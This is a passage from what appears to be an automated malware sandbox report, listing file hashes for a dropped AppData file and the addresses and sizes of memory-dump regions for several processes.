      6c10329f61455d1c96e041b6f89ee6260af3bd0f

      SHA256

      7cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903

      SHA512

      a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370

    • C:\Users\Admin\AppData\Roaming\Domkirken40.Kon

      Filesize

      446KB

      MD5

      147387bd4f193c71205b14f710bfa34d

      SHA1

      d011bd678c745317d8df2bb78f4b6ec564e77586

      SHA256

      3679b9d1adb0b062d79bc30d6c381c830dc09f4b38a92ed1ab990e97b5a24747

      SHA512

      db1c515bce5c8264947285c378609c5bf61a57e9093963616241c417076c065c1db452263ccb2b94b20acfc837605feed10d3930b33b5400975f1182a63b1c71

    • memory/1920-67-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/1920-66-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/1920-58-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2220-76-0x00000000058B0000-0x0000000005C04000-memory.dmp

      Filesize

      3.3MB

    • memory/2220-90-0x0000000005F40000-0x0000000005F8C000-memory.dmp

      Filesize

      304KB

    • memory/2460-99-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/2860-26-0x0000000005BD0000-0x0000000005BF2000-memory.dmp

      Filesize

      136KB

    • memory/2860-45-0x0000000007690000-0x00000000076B2000-memory.dmp

      Filesize

      136KB

    • memory/2860-27-0x0000000005C70000-0x0000000005CD6000-memory.dmp

      Filesize

      408KB

    • memory/2860-28-0x0000000005D50000-0x0000000005DB6000-memory.dmp

      Filesize

      408KB

    • memory/2860-35-0x0000000005E40000-0x0000000006194000-memory.dmp

      Filesize

      3.3MB

    • memory/2860-24-0x0000000002B40000-0x0000000002B76000-memory.dmp

      Filesize

      216KB

    • memory/2860-40-0x0000000006480000-0x000000000649E000-memory.dmp

      Filesize

      120KB

    • memory/2860-41-0x00000000064B0000-0x00000000064FC000-memory.dmp

      Filesize

      304KB

    • memory/2860-42-0x0000000007CE0000-0x000000000835A000-memory.dmp

      Filesize

      6.5MB

    • memory/2860-43-0x0000000006A10000-0x0000000006A2A000-memory.dmp

      Filesize

      104KB

    • memory/2860-44-0x0000000007700000-0x0000000007796000-memory.dmp

      Filesize

      600KB

    • memory/2860-25-0x00000000055A0000-0x0000000005BC8000-memory.dmp

      Filesize

      6.2MB

    • memory/2860-46-0x0000000008910000-0x0000000008EB4000-memory.dmp

      Filesize

      5.6MB

    • memory/2860-48-0x0000000008EC0000-0x000000000C1A9000-memory.dmp

      Filesize

      50.9MB

    • memory/3280-13-0x00007FFBE8870000-0x00007FFBE9331000-memory.dmp

      Filesize

      10.8MB

    • memory/3280-16-0x00007FFBE8873000-0x00007FFBE8875000-memory.dmp

      Filesize

      8KB

    • memory/3280-2-0x00007FFBE8873000-0x00007FFBE8875000-memory.dmp

      Filesize

      8KB

    • memory/3280-14-0x00007FFBE8870000-0x00007FFBE9331000-memory.dmp

      Filesize

      10.8MB

    • memory/3280-23-0x00007FFBE8870000-0x00007FFBE9331000-memory.dmp

      Filesize

      10.8MB

    • memory/3280-20-0x00007FFBE8870000-0x00007FFBE9331000-memory.dmp

      Filesize

      10.8MB

    • memory/3280-8-0x0000021371100000-0x0000021371122000-memory.dmp

      Filesize

      136KB

    • memory/3280-19-0x00007FFBE8870000-0x00007FFBE9331000-memory.dmp

      Filesize

      10.8MB

    • memory/3280-18-0x00007FFBE8870000-0x00007FFBE9331000-memory.dmp

      Filesize

      10.8MB

    • memory/3492-53-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-92-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-108-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-107-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-106-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-105-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-85-0x0000000020490000-0x00000000204A9000-memory.dmp

      Filesize

      100KB

    • memory/3492-89-0x0000000020490000-0x00000000204A9000-memory.dmp

      Filesize

      100KB

    • memory/3492-88-0x0000000020490000-0x00000000204A9000-memory.dmp

      Filesize

      100KB

    • memory/3492-104-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-103-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-102-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-94-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-49-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-100-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3492-101-0x0000000000600000-0x0000000001854000-memory.dmp

      Filesize

      18.3MB

    • memory/3792-68-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/3792-64-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/3792-62-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/3792-56-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4508-61-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4508-57-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4508-65-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB